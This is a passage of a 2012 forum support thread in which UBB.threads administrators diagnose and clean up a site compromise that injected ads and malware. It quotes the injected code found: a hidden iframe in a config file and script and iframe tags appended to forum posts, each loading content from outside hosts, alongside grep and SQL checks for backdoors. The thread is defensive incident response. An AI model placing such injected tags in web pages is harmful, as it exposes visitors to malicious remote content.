Previous Thread
Next Thread
Print Thread
Hop To
Page 2 of 2 1 2
Re: Google ads appearing in threads [Re: dbremer] #250029 08/29/2012 10:47 AM
Joined: Sep 2008
Posts: 82
bakerzdosen Offline
journeyman
Offline
journeyman
Joined: Sep 2008
Posts: 82
You've gotta love Google... For some reason this response just struck me as funny on several levels:

Quote:
Hello,

Thank you for submitting a report regarding unauthorized ad code on your site. Please be aware that these ads were placed on your website without our knowledge. If you haven't already done so, you can remove the ads from your site by deleting the ad code from your site's source. In addition, we suggest that you review your site’s security to ensure that unauthorized individuals aren't able to access your website's source code.

Please rest assured that we will investigate this matter and take the appropriate actions. However, we're unable to disclose any details about the investigation, including information about the account associated with the unauthorized ad code or our decision.

We appreciate your understanding.

Sincerely,

The Google AdSense Team

Re: Google ads appearing in threads [Re: dbremer] #250033 08/29/2012 10:06 PM
Joined: Apr 2004
Posts: 224
DennyP Offline
Enthusiast
Offline
Enthusiast
Joined: Apr 2004
Posts: 224
Does it appear that the hack got in through an attached file to a post? My board does not have attached files allowed so I'm wondering if my board may be susceptible.


DennyP - www.dennyp.com
DennyP Travel
Re: Google ads appearing in threads [Re: dbremer] #250038 08/30/2012 2:09 PM
Joined: Jan 2012
Posts: 95
dbremer Offline OP
journeyman
OP Offline
journeyman
Joined: Jan 2012
Posts: 95
I don't know if this is related or not but our forums are down and I know of another site that had the same issue today.

I wonder if we ticked off this hacker by reporting to google and he is retaliating. mad


Life is Good on Bremer Pond

Bremer Pond Weather
Re: Google ads appearing in threads [Re: dbremer] #250039 08/30/2012 3:17 PM
Joined: Dec 2003
Posts: 5,992
Ruben Offline
Offline
Joined: Dec 2003
Posts: 5,992
Originally Posted by dbremer
I don't know if this is related or not but our forums are down and I know of another site that had the same issue today.

I wonder if we ticked off this hacker by reporting to google and he is retaliating. mad

Well pondboss appears to be working currently.
Using the url of http://forums.pondboss.com/
So did something change?


Blue Man Group
There is no such thing as stupid questions. Just stupid answers
Re: Google ads appearing in threads [Re: dbremer] #250042 08/30/2012 7:38 PM
Joined: Jun 2011
Posts: 112
UBBSystems Offline
Sysop
Offline
Sysop
Joined: Jun 2011
Posts: 112
looking into this, sending some logs to SD...

Re: Google ads appearing in threads [Re: dbremer] #250043 08/30/2012 8:02 PM
Joined: Apr 2007
Posts: 3,938
SD Offline
Former Developer
Offline
Former Developer
Joined: Apr 2007
Posts: 3,938
i've been looking at it with Rick too, since he is able to shell into a targetted server and watch closely wink

Re: Google ads appearing in threads [Re: SD] #250050 08/31/2012 9:12 AM
Joined: Jan 2012
Posts: 95
dbremer Offline OP
journeyman
OP Offline
journeyman
Joined: Jan 2012
Posts: 95
It was a screw up at the hosting company. They rectified and said it won't happen again.

Sorry I didn't post sooner but I don't take an Internet machine with me when I am out fishing. crazy


Life is Good on Bremer Pond

Bremer Pond Weather
Re: Google ads appearing in threads [Re: dbremer] #250089 09/03/2012 3:13 PM
Joined: Sep 2008
Posts: 82
bakerzdosen Offline
journeyman
Offline
journeyman
Joined: Sep 2008
Posts: 82
Well, ours is down. I'm doing as much as I can from my iPhone at a waterpark, but we're getting a "Cannot decode raw data" error at the moment.

Re: Google ads appearing in threads [Re: bakerzdosen] #250090 09/03/2012 3:18 PM
Joined: Dec 2003
Posts: 5,992
Ruben Offline
Offline
Joined: Dec 2003
Posts: 5,992
Originally Posted by bakerzdosen
Well, ours is down. I'm doing as much as I can from my iPhone at a waterpark, but we're getting a "Cannot decode raw data" error at the moment.

I get a :
Quote:
We encountered a problem. The reason reported was

Unable to connect to database server, please try again in a few minutes.

Please click back to return to the previous page.


Blue Man Group
There is no such thing as stupid questions. Just stupid answers
Re: Google ads appearing in threads [Re: dbremer] #250091 09/03/2012 5:36 PM
Joined: Sep 2008
Posts: 82
bakerzdosen Offline
journeyman
Offline
journeyman
Joined: Sep 2008
Posts: 82
Well, FWIW, I did something that might have been "dumb" (wouldn't be the first time in my life.)

I have a cronjob running (I alluded to in an earlier post) that deletes all php code from the writable directories. It's possible that may have interrupted the exploit...

Re: Google ads appearing in threads [Re: dbremer] #250092 09/03/2012 5:42 PM
Joined: Sep 2008
Posts: 82
bakerzdosen Offline
journeyman
Offline
journeyman
Joined: Sep 2008
Posts: 82
Well, in poking around a bit, I found this at the top of our includes/config.inc.php file:

Quote:
<iframe src=http://www.ghananation.com/Alumni/photos/albums/ads.html width=116 height=1 frameborder=0></iframe>


Removing that fixed the problem.

Sheesh. I've gotta work on locking this down a LOT more. For now at least, I 744'd that file (which is owned by root.)

NOTE: You probably do NOT want to open that page if you're running a Microsoft operating system. Consider yourself warned.

Quote:
This program must be run under Win32

Last edited by bakerzdosen; 09/03/2012 6:06 PM.
Re: Google ads appearing in threads [Re: dbremer] #250093 09/03/2012 5:43 PM
Joined: Mar 2007
Posts: 522
SteveS Offline
Addict
Offline
Addict
Joined: Mar 2007
Posts: 522
At least it's running now.


Steve

UBB.classic from 2000-2003
UBB.threads from 2003-present!
Re: Google ads appearing in threads [Re: bakerzdosen] #250096 09/03/2012 7:16 PM
Joined: Jun 2006
Posts: 9,243
Rick Offline
Former Developer
Offline
Former Developer
Joined: Jun 2006
Posts: 9,243
Here's a few commands you'll want to run from shell to look for any more exploited code

grep -R eval * | grep POST
grep -R eval * | grep REQUEST

Found a few of these in various files on a couple servers that allowed for the hacker to pretty much do whatever they want.

Re: Google ads appearing in threads [Re: dbremer] #250213 09/11/2012 2:49 PM
Joined: Sep 2008
Posts: 82
bakerzdosen Offline
journeyman
Offline
journeyman
Joined: Sep 2008
Posts: 82
Rick,

I never mentioned: Thanks for that. I found two more places where they'd injected code in a similar manner. One in our includes/header.php file and one in a php file in images/forumimages/default/.

I'm becoming chmod'ing fool on this server... I'm about to find out what happens when UBB is incredibly restricted due to permissions to the filesystem.

Re: Google ads appearing in threads [Re: Rick] #250393 09/25/2012 11:36 PM
Joined: Feb 2007
Posts: 48
Echo Lima Offline
journeyman
Offline
journeyman
Joined: Feb 2007
Posts: 48
Originally Posted by Rick
Well, two of the sites I have worked on, every post in the database was modified, several million, adding this to the end of the POST_BODY field:

<script src=http://snipershide.com/wp-content/texashunting.js></script><br /><script src=http://snipershide.com/wp-content/texashunting.js></script><script src=http://snipershide.com/wp-content/texashunting.js></script><br /><iframe src=http://forums.weddingbells.ca/tmp/index.html width=750 height=110></iframe>

It's a somewhat easy cleanup with a mysql replace, but it takes quite awhile. Anyone with this issue, I'd look at your ubbt_POSTS table, specifically at the POST_BODY field. It won't show up when editing the post, because the POST_DEFAULT_BODY field isn't altered, so you'll need to use some type of mysql tool.

Quick way to check would be to run the following SQL:

select count(*) from ubbt_POSTS where POST_BODY LIKE '%<iframe%' or POST_BODY LIKE '%<script%'


We scrubbed Sniper's Hide and now we are just dealing with what is on left on the two other sites,

forums.weddingbells.ca

forums.canadianfamily.ca

The hackers left several pieces of code and back doors in, but my biggest issues is the dump that pulls from these two other sites putting a huge load on our forum.

We have the latest software installed, the patches and all, but still we can't control what was inserted into other sites.

if anyone knows these two sites have them scrub there pages as it is still pulling from there.

Re: Google ads appearing in threads [Re: dbremer] #250394 09/25/2012 11:54 PM
Joined: Jun 2006
Posts: 15,846
Gizmo Online Tapedshut
UBB.threads Developer
Online Tapedshut
UBB.threads Developer
Joined: Jun 2006
Posts: 15,846
Could you have your server guys deny requests to the server from those ip's that're trolling content on your site?


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Need to Upgrade?
Forums: A Gardeners Forum Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Re: Google ads appearing in threads [Re: dbremer] #250395 09/25/2012 11:58 PM
Joined: Feb 2007
Posts: 48
Echo Lima Offline
journeyman
Offline
journeyman
Joined: Feb 2007
Posts: 48
I think they did, apparently it is not working,

Re: Google ads appearing in threads [Re: dbremer] #250440 09/30/2012 1:18 PM
Joined: Oct 2007
Posts: 263
Baldeagle Offline
Enthusiast
Offline
Enthusiast
Joined: Oct 2007
Posts: 263
So did anyone ever figure out what the entry point was?


The Stovebolt Geek
http://www.stovebolt.com/ubbthreads/ubbthreads.php

UBBThreads 7.7.3
Web Server Apache/2.4.37
PHP Version 7.2.19
MySQL Version 5.6.38
Database Size 2.23 GB
Page 2 of 2 1 2

Forum Search
ShoutChat Box
Comment Guidelines: Do post respectful and insightful comments. Don't flame, hate, spam.
Recent Topics
Followed List v7.7.2 Question
by Ruben - 11/12/2019 12:22 PM
UBB Dev
by JAISP - 11/03/2019 11:01 AM
Exceeded Number of attachments
by rbrtgrmn - 11/02/2019 9:57 PM
Forum New User Registration
by kf6zpl - 10/25/2019 10:45 AM
Having issue with redirects to UBB classic URLs
by amciotola - 10/16/2019 12:11 AM
Who's Online Now
0 registered members (), 78 guests, and 369 spiders.
Key: Admin, Global Mod, Mod
Random Gallery Image
Latest Gallery Images
Artistic structures
Artistic structures
by isaac, August 29
Stones
Stones
by isaac, August 19
Amusing Terain Scenics
Amusing Terain Scenics
by isaac, August 19
Sky places
Sky places
by isaac, August 19
Powered by UBB.threads™ PHP Forum Software 7.7.4
(Snapshot build 20191023)